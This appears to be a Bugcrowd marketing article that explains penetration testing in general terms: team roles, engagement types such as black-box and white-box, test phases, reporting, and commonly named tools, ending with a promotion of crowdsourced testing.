Penetration testing, commonly known as pen testing, is a simulated cyberattack done by authorized 3rd party ethical hackers, that tests and evaluates the security vulnerabilities of the target organization’s computer systems, networks, and application infrastructure.
Human penetration testing operators attempt to find vulnerabilities and exploit them using various tools and manual procedures. Pen testers execute a variety of tests designed to utilize known vulnerabilities and leverage misconfigurations in software and security controls. Their goal is to identify real-world security weaknesses in an organization’s security posture that an attacker could exploit. Pen testers will often mimic the behavior of real threat actors by using techniques such as social engineering. Once these security weaknesses are identified, they can be prioritized for remediation. Penetration testing is an iterative process, and over time, will reduce the risk of a successful cyberattack to the organization.
Who is involved with penetration testing?
There are many teams that are part of the penetration testing process. They include the red team, blue team, and in some organizations, the purple team. The red team consists of actual penetration testers. They design and carry out various penetration tests to penetrate the perimeter, acquire authentication, access restricted systems and data, and compromise resources. The blue team is staffed by information technology security professionals that provide day-to-day information technology support. Blue team members are often responsible for the set-up and configuration of various security controls, among other responsibilities. The blue team implements security measures to mitigate the attacks of the red team during their penetration tests. The purple team is an organization that works to facilitate communications and the resolution of action items between the red team and the blue team. They benefit from the knowledge of the infrastructure provided by the blue team and knowledge of the vulnerabilities discovered by the red team. The purple team uses this information to facilitate continuous security improvements across the organization.
There are many variations in scope for penetration tests. External network penetration tests target network security and network components accessible on the internet, such as firewalls, intrusion detection systems (IDS), switches, routers, and other devices that filter malicious traffic. External penetration tests may also target other assets such as web applications, websites, domain name servers (DNS), and email. Internal penetration tests allow a tester behind the firewall or the VPN. Once a threat actor has penetrated the VPN or firewall, how much further can they penetrate into the network. An internal penetration test can also simulate an attack by a malicious insider.
Types of Penetration Testing Engagements
The amount of information provided by the organization to be tested to the pen test team can further define the pen test engagement. Black-box penetration tests, also known as single-blind penetration tests, start with the tester knowing only the name of the target enterprise. In a black-box penetration test, generally, there is almost no information provided to the pen testers. Usually, they are given an IP address or domain name to start. This represents the knowledge that a real-world threat actor would possess. A real-world threat actor would have more time to gather data and plan the attack. White-box penetration tests, also known as open-box or crystal-box, provide the ethical hacker with limited information ahead of time about the company’s security. This might include login data, design documentation.
There are still other variations of penetration test administration and design. In a double-blind penetration test, almost no security personnel have prior knowledge of the simulated attack.
In a targeted penetration test, there is cooperation between the security personnel and the ethical hacker. During the penetration test, both parties communicate the status of their activities.
Pen Test Phases
Penetration testing is often broken down into several phases. The first phase is the pre-engagement activity. During this phase, the penetration testing team will review the goals and objectives that the target enterprise would like to achieve. The penetration testers need to begin to understand the best pen testing strategy for your organization.
The next phase is reconnaissance and planning. In this phase, the pen testers gather as much information as possible about the targeted enterprise to learn more about potential vulnerabilities. They will then be best able to plan their simulated attack and define the mix of tools they will use, both software and hardware, and the social engineering techniques they will use. All of this information comes together in the vulnerability mapping phase where the penetration testers select the attack vectors, and the techniques they will use. Vulnerability mapping depends on a good assessment of the vulnerabilities they may target. The fourth phase, exploitation, leverages the planning to now use the exploits. The ethical hacker now seeks to penetrate the environment while avoiding detection.
When the testing is complete, the pen tester will remove artifacts, including their testing tools, intermediate data sets, and special hardware modules. The pen testers will also remove anything else they modified or used during the pen test. Everything in the environment will be returned to the original state before the test began.
Upon completion, a written report is submitted by the pen testing team, and a briefing to review the findings is generally scheduled. Penetration test reports should include an explanation of the test methodologies used and how they were applied, technical findings, procedural findings, reproducibility, description of risks discovered, recommendations, and conclusions. Reports can also be done with respect to compliance requirements to meet the needs of ISO 27001, SOC2 Type 2, PCI, HITRUST, FISMA, and other compliance regulations. These penetration testing reports can often support risk assessments, such as those required to support HIPAA compliance.
The in-house teams, both purple, blue, and others, will then identify near-term areas which merit improvement, assign priorities, and then build and initiate a plan for implementation. The same will be done for longer-term areas requiring improvement. The correlation of the results of the pen testing with an organization’s assessment of risk is essential. Pen testing results can provide important input and help to drive tool rationalization decisions.
Finally, the enterprise should schedule the penetration test again to validate that vulnerabilities identified were corrected and that the improved defenses now mitigate the penetration tester techniques previously tested.
Penetration or pen-testing tools cover a wide range of specially developed tools developed by ethical hackers and other software tools commonly found within the targeted enterprise. Many of these tools ethical hackers use are available on an open-source basis. Examples of tools widely used include Kali Linux, Metasploit, Wireshark, and MimiKatz.
The practice of using tools commonly found in the enterprise by both penetration testers and threat actors is referred to as “living off the land.” This enables threat actors to become part of the target enterprise’s network and hide amongst normal day-to-day activity. Even when malicious activity is detected, since everyone uses similar tools, attribution becomes difficult to impossible.
Crowdsourced penetration testing is a new and rapidly growing method of penetration testing. Most crowdsourced plans utilize a large pool of remote, per-per-project ethical hackers. These ethical hackers are often further incentivized by linking their pay to the results of the penetration testing. Crowdsourced penetration testing has become a top choice for organizations that want to move quickly to expand and improve their security testing strategy.
Get started with Bugcrowd
Hackers aren’t waiting, so why should you? See how Bugcrowd can quickly improve your security posture.